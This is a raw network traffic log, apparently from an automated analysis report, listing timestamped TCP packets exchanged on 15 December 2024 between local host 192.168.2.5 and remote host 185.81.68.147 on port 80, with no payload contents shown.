                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.077562094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.078578949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.078877926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.078974009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.079737902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.079750061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.079848051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.080881119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.081166029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.081259966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.082058907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.082086086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.082178116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.083300114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.083311081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.083414078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.084405899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.084462881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.084546089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.085510969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.085561037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.085648060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.086728096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.086740017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.086832047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.087944984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.087956905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.088049889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.089040041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.089051962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.089144945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.090213060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.090225935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.090320110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.091368914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.091397047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.091489077 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.092442036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.092694998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.092813015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.093683004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.093696117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.093786955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.094845057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.094856024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.094954014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.095905066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.096338987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.096443892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.097067118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.097263098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.097348928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.098340988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.098351955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.098437071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.099368095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.145787001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.230703115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231133938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231250048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231281042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231302023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231550932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.232367039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.232387066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.232480049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.233488083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.233499050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.233613014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.234548092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.234724998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.234814882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.235728025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.235831022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.235923052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.236892939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.237035990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.237121105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.238131046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.238142014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.238240957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.239267111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.239377022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.239660978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.240359068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.240608931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.240703106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.241571903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.241871119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.241966963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244848013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244859934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244869947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244882107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244959116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244992971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.245573997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.245791912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.245884895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.246829987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.247111082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.247204065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248159885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248296976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248388052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248997927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.249371052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.249464035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250252008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250443935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250535965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250888109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250979900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.251074076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.251971960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.252132893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.252227068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.253144979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.253349066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.253441095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.254321098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.254435062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.254529953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.255609035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.255620003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.255738020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.256613970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.256721020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.256815910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.257800102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.257914066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.258009911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.259054899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.259066105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.259161949 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.260252953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.260287046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.260380983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.261305094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.261423111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.261521101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.262490988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.262603045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.262701988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.263636112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.263762951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.263860941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.264873981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.264908075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.265012026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.265942097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.266592026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.266695976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.267183065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.267216921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.267328978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.268384933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.268461943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.268568993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272422075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272459030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272494078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272525072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272559881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272562981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272584915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272593975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.272650957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.273051023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.273674965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.273780107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.275199890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.275233030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.275358915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.276253939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.276287079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.276392937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.277013063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.277194977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.277301073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.278264046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.278296947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.278400898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.279310942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.279673100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.279782057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.280577898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.280734062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.280838013 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.281697989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.281805038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.281898022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.282876015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.283104897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.283204079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.283998013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.284032106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.284126997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.285037994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.285260916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.285367012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.286299944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.286333084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.286432981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.287583113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.287766933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.287863016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.288840055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.288979053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.289077997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.289866924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.289900064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.289994001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.291368961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.291402102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.291496992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.292239904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.333137035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.422923088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.422938108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.423079014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.423295021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.423417091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.424186945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.424284935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.424361944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.424460888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.425421953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.425549030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.426543951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.426605940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.426707029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.426806927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.427740097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.427846909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.428838968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.428930044 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.428961992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.429056883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.430124998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.430201054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.430303097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.431305885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.431355953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.432410002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.432442904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.432497025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.432528973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.433545113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.433794975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.433897972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.434627056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.434889078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.435950994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.436002970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.436050892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.436090946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.437040091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.437074900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.437191963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.438123941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.438214064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.438633919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.439374924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.439429045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440547943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440623999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440692902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440692902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.441612959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.441740990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.441838980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.442739964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.443089962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.443182945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.444046021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.444077969 CET8049708185.81.68.147192.168.2.5
